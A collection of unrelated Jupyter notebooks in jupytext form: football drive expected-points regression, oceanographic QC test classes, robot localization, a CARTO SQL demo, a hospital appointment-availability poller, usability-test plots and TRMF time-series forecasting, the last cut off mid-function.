# Joint density: P(TD drive AND start in bin), normalised by total drive count.
td_vars['td_density'] = td_vars.td_frequency / coll_df.id.nunique()
td_vars
# -
# Probability of an offensive FG drive given starting yard line within one of these bins
# FG drives counted per 1-yard starting bin.
fg = coll_df[
    (coll_df.drive_result == 'FG')
].start_yardline.value_counts(bins=cust_bins)
fg_vars = pd.DataFrame({'yardline_bin':fg.index, 'fg_frequency':fg.values})
# Joint density: P(FG drive AND start in bin), normalised by total drive count.
fg_vars['fg_density'] = fg_vars.fg_frequency / coll_df.id.nunique()
fg_vars
# Defensive/turnover touchdowns per 1-yard starting bin, selected with `isin`
# instead of the original chain of `|`-ed comparisons (identical rows).
def_scores = coll_df[coll_df.drive_result.isin(
    ['FUMBLE TD', 'INT TD', 'DOWNS TD']
)].start_yardline.value_counts(bins=cust_bins)
def_vars = pd.DataFrame({'yardline_bin':def_scores.index, 'def_frequency':def_scores.values})
# Joint density: P(defensive TD AND start in bin), normalised by total drive count.
def_vars['def_density'] = def_vars.def_frequency / coll_df.id.nunique()
def_vars
# Safeties counted per 1-yard starting bin.
safety_scores = coll_df[
    (coll_df.drive_result == 'SF')
].start_yardline.value_counts(bins=cust_bins)
sf_vars = pd.DataFrame({'yardline_bin':safety_scores.index, 'sf_frequency':safety_scores.values})
# Joint density: P(safety AND start in bin), normalised by total drive count.
sf_vars['sf_density'] = sf_vars.sf_frequency / coll_df.id.nunique()
sf_vars
# Combine the per-outcome tables on their shared yardline bins (inner joins,
# same as the original chained pd.merge calls).
combined = (
    td_vars
    .merge(fg_vars, on='yardline_bin')
    .merge(def_vars, on='yardline_bin')
    .merge(sf_vars, on='yardline_bin')
)
combined
# combined now contains % of scoring AND position
# +
# generating prob of a specific yard line bin
pos = coll_df.start_yardline.value_counts(bins=cust_bins, normalize=True)  # marginal P(drive starts in bin)
p_pos = pd.DataFrame({'yardline_bin':pos.index, 'yardline_density':pos.values})
p_pos
# -
combined = pd.merge(combined, p_pos, on='yardline_bin')
combined
# Conditional scoring probabilities: P(outcome | bin) = joint density / bin density.
# Vectorised column division replaces the original row-wise `apply(..., axis=1)`
# lambdas -- identical values, one pandas operation per column instead of a
# Python call per row.
combined["p_td_given_pos"] = combined.td_density / combined.yardline_density
combined["p_fg_given_pos"] = combined.fg_density / combined.yardline_density
combined["p_def_given_pos"] = combined.def_density / combined.yardline_density
combined["p_sf_given_pos"] = combined.sf_density / combined.yardline_density
combined.head()
# +
def translate(value, leftMin, leftMax, rightMin, rightMax):
    """Linearly map *value* from the range [leftMin, leftMax] onto
    [rightMin, rightMax]."""
    # Fraction of the way through the source range (a float; values outside
    # the source range extrapolate past 0 or 1).
    fraction = float(value - leftMin) / float(leftMax - leftMin)
    # Re-scale that fraction onto the target range.
    return rightMin + (fraction * (rightMax - rightMin))
def yardline_weight(row):
    """Linear field-position weight in [0, 1]: 0 at the 25, 1 at the 100."""
    return translate(row.yardline, 25, 100, 0, 1)
def weighted_epa(row):
    """Expected points for a drive, scaled by the field-position weight."""
    raw_points = (7 * row.p_td_given_pos + 3 * row.p_fg_given_pos
                  - 2 * row.p_sf_given_pos - 7 * row.p_def_given_pos)
    return yardline_weight(row) * raw_points
combined['yardline'] = combined.yardline_bin.apply(lambda x: x.left)  # numeric left edge of each Interval bin
combined['ep'] = combined.apply(lambda x: weighted_epa(x), axis=1)  # position-weighted expected points per bin
combined
# -
f, ax = plt.subplots(figsize=(15,8))
# BUG FIX: the original called sort_values() without assigning the result, so
# the sort was silently discarded; keep the frame ordered by yardline.
combined = combined.sort_values(by=["yardline"])
ax.scatter(combined.yardline, combined.ep);
ax.set_xlabel("Yard Line (0 = team endzone; 100 = opponent endzone)")
ax.set_ylabel("Expected Points");
# +
# Random 80/20 row split (NOTE: no RNG seed is set, so the split differs per run).
msk = np.random.rand(len(combined)) < 0.80
train_data = combined[msk]
test_data = combined[~msk]
train_data.head()
# -
# Linear Regression Model
from sklearn.linear_model import LinearRegression
# Fit a simple linear EP ~ yardline baseline.
model = LinearRegression()
# pandas removed multi-dim Series indexing (`s[:, np.newaxis]`); go through numpy.
model.fit(train_data.yardline.to_numpy()[:, np.newaxis], train_data.ep)
# NOTE(review): xfit spans [0, n_train_rows], not the 0-100 yardline range --
# confirm this is the intended x-axis for the prediction curve.
xfit = np.linspace(0, len(train_data), len(train_data))
yfit = model.predict(xfit[:, np.newaxis])
print(f'Linear Regression: y = {model.coef_[0]:.5f}x + {model.intercept_:.5f}')
ax.plot(xfit, yfit, color='red', label='Linear Regression');
# +
# Polynomial Regression Model
from sklearn.preprocessing import PolynomialFeatures
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error
def poly_regress(degree, plot, color):
    """Fit a polynomial regression of the given degree to the global training
    data, draw its prediction curve on *plot*, print the coefficients and MAE,
    and return the fitted LinearRegression."""
    poly = PolynomialFeatures(degree=degree)
    # pandas removed multi-dim Series indexing (`s[:, np.newaxis]`); convert
    # to a numpy column first.
    X_ = poly.fit_transform(train_data.yardline.to_numpy()[:, np.newaxis])
    X_test_ = poly.fit_transform(xfit[:, np.newaxis])
    lg = LinearRegression()
    # Fit
    lg.fit(X_, train_data.ep)
    quady_fit = lg.predict(X_test_)
    # BUG FIX: the original drew on the global `ax` and ignored the `plot`
    # argument; callers pass `ax`, so using `plot` keeps behaviour identical
    # while honouring the parameter.
    plot.plot(xfit, quady_fit, color=color, label=f'Poly Regression (degree: {degree})')
    print(f'Regression Coefficients: {lg.coef_}')
    # MAE against the training targets (quady_fit is evaluated on xfit).
    error = mean_absolute_error(train_data.ep.to_numpy()[:, np.newaxis], quady_fit)
    print(f'MAE: {error:.4f}')
    return lg
quad1 = poly_regress(2, ax, 'g')
# NOTE(review): PolynomialFeatures puts the bias column first with ascending
# powers after it, so the exponent labels in these printed formulas do not
# match the coefficient order -- left as-is apart from the typo fix below.
print(f'Polynomial Regression (with degree 2): y = {quad1.coef_[0]:.5f}x^3 + {quad1.coef_[1]:.5f}x^2 + {quad1.coef_[2]:.5f}x + {quad1.intercept_:.5f}')
quad2 = poly_regress(3, ax, 'b')
print(f'Polynomial Regression (with degree 3): y = {quad2.coef_[0]:.7f}x^4 + {quad2.coef_[1]:.7f}x^3 + {quad2.coef_[2]:.5f}x^2 + {quad2.coef_[3]:.7f}x + {quad2.intercept_:.7f}')
quad3 = poly_regress(4, ax, 'y')
print(f'Polynomial Regression (with degree 4): y = {quad3.coef_[0]:.7f}x^5 + {quad3.coef_[1]:.7f}x^4 + {quad3.coef_[2]:.7f}x^3 + {quad3.coef_[3]:.5f}x^2 + {quad3.coef_[4]:.7f}x + {quad3.intercept_:.7f}')
quad4 = poly_regress(5, ax, 'purple')
# BUG FIX: the x^4 coefficient below previously read from quad3 instead of quad4.
print(f'Polynomial Regression (with degree 5): y = {quad4.coef_[0]:.7f}x^6 + {quad4.coef_[1]:.7f}x^5 + {quad4.coef_[2]:.7f}x^4 + {quad4.coef_[3]:.7f}x^3 + {quad4.coef_[4]:.5f}x^2 + {quad4.coef_[5]:.7f}x + {quad4.intercept_:.7f}');
ax.legend(loc='upper right');
# +
# Testing: evaluate every fitted model on the held-out rows. The original
# repeated the same three statements for each model; a single loop produces
# the same columns in the same order.
test_dataset = test_data.copy()
# pandas removed multi-dim Series indexing (`s[:, np.newaxis]`); convert once.
_yard_col = test_dataset.yardline.to_numpy()[:, np.newaxis]
_truth_col = test_dataset.ep.to_numpy()[:, np.newaxis]
# (label, polynomial degree or None for the plain linear model, fitted estimator)
_candidates = [
    ('quad0', None, model),
    ('quad1', 2, quad1),
    ('quad2', 3, quad2),
    ('quad3', 4, quad3),
    ('quad4', 5, quad4),
]
for _label, _degree, _estimator in _candidates:
    if _degree is None:
        _features = _yard_col
    else:
        _features = PolynomialFeatures(degree=_degree).fit_transform(_yard_col)
    _pred = f'{_label}_ep_prediction'
    test_dataset[_pred] = _estimator.predict(_features)
    # median_absolute_error returns a scalar, broadcast to the whole column
    # (same as the original assignment).
    test_dataset[f'{_pred}_error'] = median_absolute_error(_truth_col, test_dataset[_pred])
    # Vectorised percentage error replaces the row-wise apply (same values).
    test_dataset[f'{_pred}_error_pct'] = 100 * test_dataset[f'{_pred}_error'] / test_dataset.ep
test_dataset.head()
# -
# Median percentage prediction error per model on the held-out rows (lower = better fit).
validation_medians = pd.DataFrame(data={"strategy":["Linear","Degree2","Degree3","Degree4","Degree5"], "median_error":[test_dataset.quad0_ep_prediction_error_pct.median(),test_dataset.quad1_ep_prediction_error_pct.median(),test_dataset.quad2_ep_prediction_error_pct.median(),test_dataset.quad3_ep_prediction_error_pct.median(),test_dataset.quad4_ep_prediction_error_pct.median()]}, columns=["strategy","median_error"])
validation_medians
import numpy as np
generated_yardlines = np.linspace(0, 100, 101)
generated_yardlines
csv_dump_frame = pd.DataFrame({'yardline':generated_yardlines})
csv_yardline_quad2 = PolynomialFeatures(degree=3).fit_transform(csv_dump_frame.yardline[:, np.newaxis])
csv_dump_frame['ep'] = quad2.predict(csv_yardline_quad2)
csv_dump_frame.head()
csv_dump_frame.to_csv('results/ep.csv', index=False)
|
cfb-drive-pbp-analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # [WIP] Creating New Tests
# How to implement a new QC test in CoTeDe?
# ### Objective:
# Show how to extend CoTeDe by creating new QC checks.
#
# CoTeDe contains a collection of checks to evaluate the quality of the data. The user can define the parameters for each test, such as changing the acceptable threshold of the spike check, but sometimes a completely different procedure might be necessary. CoTeDe was developed with the principle of a single engine into which modular checks can be plugged. Here you will see how to create a new check.
import numpy as np
from bokeh.io import output_notebook, show
from bokeh.plotting import figure
output_notebook()
# Currently there are two main types of tests, QCCheck() and QCCheckVar().
#
# - QCCheck is a hard coded test and doesn't change according to the variable being evaluated. The criteria doesn't change independent of the variable being evaluated. For instance, the increasing pressure test defined by Argo will always check pressure, independent if the goal is to QC temperature, salinity, or chlorophyll.
#
# - QCCheckVar checks a given variable. The criteria is applied on the specific variable. For instance, although the spike test procedure is always the same, it is applied on the temperature values if the temperature
from cotede.qctests import QCCheck, QCCheckVar
# https://github.com/castelao/CoTeDe/blob/master/cotede/qctests/qctests.py
#
# Note that QCCheck() only requires the data object as input.
# Let's suppose that platforms 10 and 11 had bad sensors and any measurements from those should be flagged bad. Note that in this case it doesn't matter which variable we are evaluating, so let's create a new test based on cotede.qctests.QCCheck
#
# The first question is how is the platform identified in the data object? Let's suppose that this is available in the attributes of the data object, i.e. in data.attrs.
class GreyList(QCCheck):
    def test(self):
        """Example test to identify measurements from known bad platforms

        How to identify the platform in this data object? You need to tell. Let's suppose
        that it is available at

        >>> self.data.attrs["platform"]
        """
        platform = self.data.attrs["platform"]
        self.flags = {}
        if platform in (10, 11):
            # Known bad sensors: everything from these platforms is flagged bad.
            flag = np.array(self.flag_bad, dtype="i1")
        else:
            flag = np.array(self.flag_good, dtype="i1")
        # fix: the computed flag was previously discarded, leaving self.flags
        # empty; record it so the framework can use the result of this check.
        self.flags["grey_list"] = flag
# ### A test based on the measurements itself: Maximum Value
class MaximumValue(QCCheckVar):
    """Flag measurements of the evaluated variable that exceed a
    configurable maximum value (cfg["threshold"])."""

    def test(self):
        assert ("threshold" in self.cfg), "Missing acceptable threshold"
        threshold = self.cfg["threshold"]
        feature = self.data[self.varname]
        self.flags = {}
        flag = np.zeros(np.shape(feature), dtype="i1")
        # fix: the original referenced undefined names (minval, maxval, x, ma)
        # and would raise NameError; implement the maximum-value check the
        # class name and cfg describe, using np.ma for masked values.
        flag[feature > threshold] = self.flag_bad
        flag[feature <= threshold] = self.flag_good
        # Masked or non-finite measurements get flag 9 (missing value).
        flag[np.ma.getmaskarray(feature) | ~np.isfinite(feature)] = 9
        self.flags["maximum_value"] = flag
# ### Spike test for chlorophyll - BGC Argo
#
# BGC Argo defines the spike test based on a running median, defined as
#
# RES = V2 - median(V0, V1, V2, V3, V4)
#
# bad if RES < 2 * percentile10(RES)
#
# Where percentile10 is the lowest 10% measurements for that profile
# +
def median_spike(x):
    """Residual of *x* against a centered 5-point running median.

    Returns an array the same length as *x*. Positions without a full
    5-point window (and index 0 / -1) are left as NaN.
    """
    N = len(x)
    lowpass = np.nan * np.ones(N)
    for n in range(N - 4):
        lowpass[n + 2] = np.median(x[n : n + 5])
    # fix: delta was assigned by slice before ever being created (NameError);
    # initialize it as an all-NaN array first.
    delta = np.nan * np.ones(N)
    delta[1:-1] = x[1:-1] - lowpass[1:-1]
    return delta
class BGCChlSpike(QCCheckVar):
    """Spike test as recommended by the BGC Argo.

    Flags values above cfg["threshold"] as bad, the rest as good; masked
    or non-finite source values get flag 9 (missing value).

    NOTE(review): set_features() computes a "spike_median" feature that
    test() does not use — test() thresholds the raw variable instead.
    Confirm against the BGC Argo spec (bad if RES < 2 * percentile10(RES)).
    """
    cfg = {"threshold": 2}

    def set_features(self):
        # Derived feature: residual against a 5-point running median.
        self.features = {
            "spike_median": median_spike(self.data[self.varname]),
        }

    def test(self):
        self.flags = {}
        assert ("threshold" in self.cfg), "Missing acceptable threshold"
        threshold = self.cfg["threshold"]
        feature = np.atleast_1d(self.data[self.varname])
        flag = np.zeros(feature.shape, dtype="i1")
        flag[feature > threshold] = self.flag_bad
        flag[feature <= threshold] = self.flag_good
        x = self.data[self.varname]
        # fix: `ma` was never imported in this notebook (only numpy, bokeh,
        # and cotede.qctests are) — use np.ma to avoid a NameError.
        flag[np.ma.getmaskarray(x) | ~np.isfinite(x)] = 9
        self.flags["bgc_spike"] = flag
# +
# Record whether pandas is installed so the pandas-based variant below can
# be used conditionally.
try:
    import pandas as pd

    # fix: the flag was inverted (False on successful import, True on
    # failure); also catch only ImportError instead of a bare except.
    PANDAS_AVAILABLE = True
except ImportError:
    PANDAS_AVAILABLE = False
def spike_median(x):
    """Spike feature: residual from a centered 5-point rolling median,
    normalized by the residuals' 10th percentile (pandas Series in/out)."""
    centered_median = x.rolling(5, center=True).median()
    residual = x - centered_median
    return residual / residual.quantile(.1)
class BGCChlSpike(QCCheckVar):
    """Spike test as recommended by the BGC Argo (pandas variant).

    Same contract as the loop-based version above, but set_features()
    derives the spike feature with a pandas rolling median.

    NOTE(review): test() thresholds the raw variable rather than the
    "spike_median" feature computed in set_features(); confirm against
    the BGC Argo spec (bad if RES < 2 * percentile10(RES)).
    """
    cfg = {"threshold": 2}

    def set_features(self):
        # Derived feature: normalized residual from a centered rolling median.
        self.features = {
            "spike_median": spike_median(self.data[self.varname]),
        }

    def test(self):
        self.flags = {}
        assert ("threshold" in self.cfg), "Missing acceptable threshold"
        threshold = self.cfg["threshold"]
        feature = np.atleast_1d(self.data[self.varname])
        flag = np.zeros(feature.shape, dtype="i1")
        flag[feature > threshold] = self.flag_bad
        flag[feature <= threshold] = self.flag_good
        x = self.data[self.varname]
        # fix: `ma` was never imported in this notebook — use np.ma to
        # avoid a NameError when masking invalid values (flag 9).
        flag[np.ma.getmaskarray(x) | ~np.isfinite(x)] = 9
        self.flags["bgc_spike"] = flag
|
docs/notebooks/creating_new_tests.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# Modify the previous code so that the robot senses red twice.
p=[0.2, 0.2, 0.2, 0.2, 0.2]
world=['green', 'red', 'red', 'green', 'green']
measurements = ['red', 'red']
motions = [1,1]
pHit = 0.6
pMiss = 0.2
pExact = 0.8
pOvershoot = 0.1
pUndershoot = 0.1

def sense(p, Z):
    """Measurement update: reweight the belief *p* by how well each cell
    of *world* matches the observation *Z*, then renormalize to sum to 1."""
    weighted = [prior * (pHit if world[i] == Z else pMiss)
                for i, prior in enumerate(p)]
    total = sum(weighted)
    return [w / total for w in weighted]
def move(p, U):
    """Motion update: shift the belief *p* by *U* cells (cyclic world),
    mixing exact, overshoot, and undershoot outcomes."""
    n = len(p)
    return [pExact * p[(i - U) % n]
            + pOvershoot * p[(i - U - 1) % n]
            + pUndershoot * p[(i - U + 1) % n]
            for i in range(n)]
# Alternate measurement and motion updates for each (measurement, motion)
# pair, then print the final belief distribution.
for k in range(len(measurements)):
    p = sense(p, measurements[k])
    p = move(p, motions[k])
print(p)
|
test_code/Q2_31_Sense_and_Move_2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from cartoframes.auth import Credentials
from cartoframes.client import SQLClient
# +
# Connect with the public demo account; the api_key only allows read access.
credentials = Credentials(username='cartovl', api_key='default_public')
sql = SQLClient(credentials)
# -
# ### Query
sql.query('SELECT adm0name, pop_max, the_geom FROM populated_places LIMIT 1')
sql.query('SELECT adm0name, pop_max, the_geom FROM populated_places LIMIT 1', verbose=True)
# ### Execute
# +
# sql.execute('SELECT * FROM populated_places')
# -
# ### Helpers
# Convenience wrappers around common introspection queries.
sql.distinct('populated_places', 'adm_0_cap_name')
sql.count('populated_places')
sql.bounds('SELECT * FROM populated_places WHERE adm0name = \'Spain\'')
sql.schema('populated_places')
sql.schema('populated_places', raw=True)
sql.describe('populated_places', 'adm0name')
sql.describe('populated_places', 'pop_max')
# +
# Write operations (require an API key with write permission; kept commented).
# sql.create_table('test', [('id', 'INT'), ('name', 'TEXT')]) # cartodbfy=False
# sql.insert_table('test', ['id', 'name'], [0, 'a'])
# sql.update_table('test', 'name', 'b', 'id = 0')
# sql.rename_table('test', 'new_test')
# sql.drop_table('new_test')
|
examples/_debug/SQL_client.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import requests
import bs4
import time
import traceback
# +
# Appointment query URL, copied from the browser address bar.
url = 'http://www.bjguahao.gov.cn/dpt/appoint/133-200001351.htm?week=1&relType=0&sdFirstId=0&sdSecondId=0'
refresh_cd = 1 # retry interval (seconds)
sess = requests.Session()
cnt = 0
# Poll the appointment page until any slot is available (i.e. a cell whose
# status text is non-empty and not '约满' / "fully booked").
while True:
    try:
        rst = sess.get(url)
        rst.encoding='utf-8'
        rst_text = rst.text
        soup = bs4.BeautifulSoup(rst_text, 'html.parser')
        # Cells of the second table row: one per day of the week.
        tds = soup.select('.ksorder_cen_l_t_c table tr:nth-of-type(2) td')
        # NOTE(review): if tds is empty, status/date are never assigned and
        # the check below raises NameError — confirm the selector is stable.
        for td in tds:
            status = td.text.strip()
            date = td.select('input')[0].attrs['value'].split('_')[2]
            if status is not None and status != '' and status != '约满':
                break
        if status is not None and status != '' and status != '约满':
            # Found an open slot: report it and stop polling.
            print(status, date)
            break
        else:
            cnt += 1
            if cnt % 10 == 1:
                print('retries:', cnt)
        time.sleep(refresh_cd)
    except KeyboardInterrupt:
        break
    except:
        # Best-effort retry on any network/parse error: log the traceback
        # and start a fresh session.
        traceback.print_exc()
        sess.close()
        sess = requests.Session()
|
ChaHao.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: omnipotent (Python 3.6)
# language: python
# name: omnipotent
# ---
# # Jupyterlab testing
# +
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import seaborn as sns
import analysis_utils
sns.set()
# +
# Load data.
data = analysis_utils.load_data()
# Task mapping: each top-level task id -> the "Subtask #" ids that belong
# to it (used by the filtering in success_plot / tot_plot below).
task_mapping = {
    34: [70, 71],
    35: [72, 73, 74],
    36: [75, 76, 77],
    37: [78, 79]
}
data.head(n=10)
# +
# Subset dataframes
task = 34
def success_plot(task, ax):
    """Horizontal bar chart of first/second/eventual success fractions for
    all subtasks of *task* (uses module-level `data` and `task_mapping`).

    Column names carry their original trailing spaces from the spreadsheet.
    """
    subset = data[data["Subtask #"].isin(task_mapping[task])]
    counts = np.array([
        len(subset[subset["Eventual Success (# or N)"].isin(range(1, 10))]),
        len(subset[subset["Second Success (Y or N) "] == "Y"]),
        len(subset[subset["First Success (Y or N) "] == "Y"]),
    ])
    fractions = counts / counts.sum()
    positions = np.array([0, 1, 2])
    ax.barh(positions, fractions, height=0.5, align='center')
    ax.set_yticks([0, 1, 2])
    ax.set_yticklabels(["Eventual success", "Second success", "First success"])
    ax.set_title(f"Task #{task}")
    ax.set_xlim([0, 1])
# +
fig, axes = plt.subplots(nrows=4, figsize=(6, 8), sharex=True)
success_plot(34, axes[0])
success_plot(35, axes[1])
success_plot(36, axes[2])
success_plot(37, axes[3])
axes[3].set_xlabel("Fraction of Tests")
# -
def tot_plot(task, ax):
    """Kernel-density plot of time-on-task for *task*, excluding outliers
    of 100 s or more (uses module-level `data` and `task_mapping`)."""
    subset = data[
        (data["Subtask #"].isin(task_mapping[task]))
        & (data["Time on task"] < 100)
    ]
    # NOTE: sns.distplot is deprecated in newer seaborn; kept for parity.
    sns.distplot(subset["Time on task"], ax=ax, rug=True, hist=False, kde_kws={"shade": True})
    ax.set_yticklabels([])
    ax.set_title("Kernel density estimation")
    ax.set_xlim(0, 100)
    ax.set_xlabel("")
    # Second set_title call intentionally overrides the first (original behavior).
    ax.set_title(f"Task #{task}")
# +
fig, axes = plt.subplots(nrows=4, figsize=(6, 12), sharex=True)
tot_plot(34, axes[0])
tot_plot(35, axes[1])
tot_plot(36, axes[2])
tot_plot(37, axes[3])
axes[3].set_xlabel("Time on Task (s)")
# -
|
surveys/2018-09-jupytercon-2018/jupyterlab_test/jupyterlab-test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] pycharm={"name": "#%% md\n"}
# Temporal regularized matrix factorization (TRMF) for metro OD forecasting. Code is adapted from [https://github.com/xinychen/transdim](https://github.com/xinychen/transdim).
#
# Original paper for TRMF:
# - <NAME>, <NAME>, <NAME>, 2016. Temporal regularized matrix factorization for high-dimensional time series prediction. 30th Conference on Neural Information Processing Systems (NIPS 2016).
#
# # Define functions
# +
from functions import *
from numpy.linalg import inv as inv
import random
import time
def reset_random_seeds(n=1):
    """Make runs reproducible: pin the hash seed, Python's builtin RNG,
    and NumPy's RNG to the same integer seed *n*."""
    os.environ['PYTHONHASHSEED'] = str(n)
    random.seed(n)
    np.random.seed(n)
def ar4cast(theta, X, time_lags, multi_step):
    """Forecast *multi_step* rows ahead of the latent factor matrix X.

    Each appended row t is the lag-weighted sum of earlier rows:
    X[t, r] = sum_k theta[k, r] * X[t - time_lags[k], r].
    Returns X with multi_step forecast rows appended.
    """
    num_obs, rank = X.shape
    X_ext = np.vstack([X, np.zeros((multi_step, rank))])
    for step in range(multi_step):
        t = num_obs + step
        X_ext[t, :] = np.einsum('kr, kr -> r', theta, X_ext[t - time_lags, :])
    return X_ext
def TRMF(dense_mat, sparse_mat, init_para, init_hyper, time_lags, maxiter):
    """Temporal Regularized Matrix Factorization, TRMF.

    Alternately updates the spatial factors W, the temporal factors X, and
    the AR coefficients theta for `maxiter` iterations, then forecasts
    ahead with ar4cast.

    NOTE(review): the number of forecast steps comes from the *global*
    multi_step, not a parameter — confirm it is set before calling.
    Returns (mat_hat, W, X_new, theta), where mat_hat has the forecast
    columns appended on the right.
    """
    ## Initialize parameters
    W = init_para["W"]
    X = init_para["X"]
    theta = init_para["theta"]
    ## Set hyperparameters
    lambda_w = init_hyper["lambda_w"]
    lambda_x = init_hyper["lambda_x"]
    lambda_theta = init_hyper["lambda_theta"]
    eta = init_hyper["eta"]
    dim1, dim2 = sparse_mat.shape
    pos_train = np.where(sparse_mat != 0)
    # NOTE(review): pos_test and binary_mat are computed but never used below.
    pos_test = np.where((dense_mat != 0) & (sparse_mat == 0))
    binary_mat = sparse_mat.copy()
    binary_mat[pos_train] = 1
    d, rank = theta.shape
    for it in range(maxiter):
        ## Update spatial matrix W (ridge regression per location, using
        ## only the time steps observed for that location)
        for i in range(dim1):
            pos0 = np.where(sparse_mat[i, :] != 0)
            Xt = X[pos0[0], :]
            vec0 = Xt.T @ sparse_mat[i, pos0[0]]
            mat0 = inv(Xt.T @ Xt + lambda_w * np.eye(rank))
            W[i, :] = mat0 @ vec0
        ## Update temporal matrix X (data term plus AR smoothness terms)
        for t in range(dim2):
            pos0 = np.where(sparse_mat[:, t] != 0)
            Wt = W[pos0[0], :]
            Mt = np.zeros((rank, rank))
            Nt = np.zeros(rank)
            if t < np.max(time_lags):
                # Not enough history yet for the AR prior.
                Pt = np.zeros((rank, rank))
                Qt = np.zeros(rank)
            else:
                Pt = np.eye(rank)
                Qt = np.einsum('ij, ij -> j', theta, X[t - time_lags, :])
            if t < dim2 - np.min(time_lags):
                # Lags for which t also appears as a *past* step of some
                # later time index within range.
                if t >= np.max(time_lags) and t < dim2 - np.max(time_lags):
                    index = list(range(0, d))
                else:
                    index = list(np.where((t + time_lags >= np.max(time_lags)) & (t + time_lags < dim2)))[0]
                for k in index:
                    Ak = theta[k, :]
                    Mt += np.diag(Ak ** 2)
                    theta0 = theta.copy()
                    theta0[k, :] = 0
                    Nt += np.multiply(Ak, X[t + time_lags[k], :]
                                      - np.einsum('ij, ij -> j', theta0, X[t + time_lags[k] - time_lags, :]))
            vec0 = Wt.T @ sparse_mat[pos0[0], t] + lambda_x * Nt + lambda_x * Qt
            mat0 = inv(Wt.T @ Wt + lambda_x * Mt + lambda_x * Pt + lambda_x * eta * np.eye(rank))
            X[t, :] = mat0 @ vec0
        ## Update AR coefficients theta (one lag k at a time, regressing the
        ## residual of the other lags on the lag-k factors)
        for k in range(d):
            theta0 = theta.copy()
            theta0[k, :] = 0
            mat0 = np.zeros((dim2 - np.max(time_lags), rank))
            for L in range(d):
                mat0 += X[np.max(time_lags) - time_lags[L] : dim2 - time_lags[L] , :] @ np.diag(theta0[L, :])
            VarPi = X[np.max(time_lags) : dim2, :] - mat0
            var1 = np.zeros((rank, rank))
            var2 = np.zeros(rank)
            for t in range(np.max(time_lags), dim2):
                B = X[t - time_lags[k], :]
                var1 += np.diag(np.multiply(B, B))
                var2 += np.diag(B) @ VarPi[t - np.max(time_lags), :]
            theta[k, :] = inv(var1 + lambda_theta * np.eye(rank) / lambda_x) @ var2
    # Forecast multi_step (global) steps ahead and append to the fitted matrix.
    X_new = ar4cast(theta, X, time_lags, multi_step)
    mat_new = W @ X_new[- multi_step :, :].T
    mat_hat = W @ X.T
    mat_hat = np.append(mat_hat, mat_new, axis = 1)
    return mat_hat, W, X_new, theta
def update_x_partial(sparse_mat, W, X, theta, lambda_x, eta, time_lags, back_step):
    """Re-run TRMF's temporal-factor (X) update on only the last
    `back_step` time steps, keeping W and theta fixed.

    Used for cheap rolling updates when new columns arrive; mirrors the
    X-update loop inside TRMF(). Mutates and returns X.
    """
    d = time_lags.shape[0]
    dim2, rank = X.shape
    tmax = np.max(time_lags)
    for t in range(dim2 - back_step, dim2):
        # Locations observed at time t.
        pos0 = np.where(sparse_mat[:, t] != 0)
        Wt = W[pos0[0], :]
        Mt = np.zeros((rank, rank))
        Nt = np.zeros(rank)
        if t < tmax:
            # Not enough history yet for the AR prior.
            Pt = np.zeros((rank, rank))
            Qt = np.zeros(rank)
        else:
            Pt = np.eye(rank)
            Qt = np.einsum('ij, ij -> j', theta, X[t - time_lags, :])
        if t < dim2 - np.min(time_lags):
            if t >= tmax and t < dim2 - tmax:
                index = list(range(0, d))
            else:
                index = list(np.where((t + time_lags >= tmax) & (t + time_lags < dim2)))[0]
            for k in index:
                Ak = theta[k, :]
                Mt += np.diag(Ak ** 2)
                theta0 = theta.copy()
                theta0[k, :] = 0
                Nt += np.multiply(Ak, X[t + time_lags[k], :]
                                  - np.einsum('ij, ij -> j', theta0, X[t + time_lags[k] - time_lags, :]))
        vec0 = Wt.T @ sparse_mat[pos0[0], t] + lambda_x * Nt + lambda_x * Qt
        mat0 = inv(Wt.T @ Wt + lambda_x * Mt + lambda_x * Pt + lambda_x * eta * np.eye(rank))
        X[t, :] = mat0 @ vec0
    return X
def TRMF_partial(dense_mat, sparse_mat, init_para, init_hyper, time_lags, maxiter):
    """Cheap rolling TRMF update: refresh only the most recent temporal
    factors (W and theta stay fixed), then forecast ahead.

    NOTE(review): relies on the *global* multi_step rather than a
    parameter, and dense_mat is accepted but unused here.
    Returns (mat_hat, W, X_new, theta), where mat_hat holds only the
    multi_step forecast columns.
    """
    ## Initialize parameters
    W = init_para["W"]
    X = init_para["X"]
    theta = init_para["theta"]
    ## Set hyperparameters
    lambda_x = init_hyper["lambda_x"]
    eta = init_hyper["eta"]
    back_step = 10 * multi_step
    for it in range(maxiter):
        X = update_x_partial(sparse_mat, W, X, theta, lambda_x, eta, time_lags, back_step)
    X_new = ar4cast(theta, X, time_lags, multi_step)
    mat_hat = W @ X_new[- multi_step :, :].T
    # Demand cannot be negative; clamp the forecasts at zero.
    mat_hat[mat_hat < 0] = 0
    return mat_hat, W, X_new, theta
def TRMF_forecast(dense_mat, sparse_mat, init_hyper, pred_step, multi_step, rank, time_lags, maxiter, maxiter2=10):
    """Rolling multi-step forecast with TRMF.

    Fits TRMF once on the first T - pred_step columns, then for each new
    time step performs a cheap partial refit (TRMF_partial) and records
    1..multi_step-step-ahead forecasts.

    NOTE(review): the loop length and result width use the *global*
    pred_time_steps, while the pred_step argument only sets the training
    cutoff — confirm these are meant to stay in sync.
    Returns a dict mapping horizon (1-based) to a (dim1, pred_time_steps)
    array of forecasts.
    """
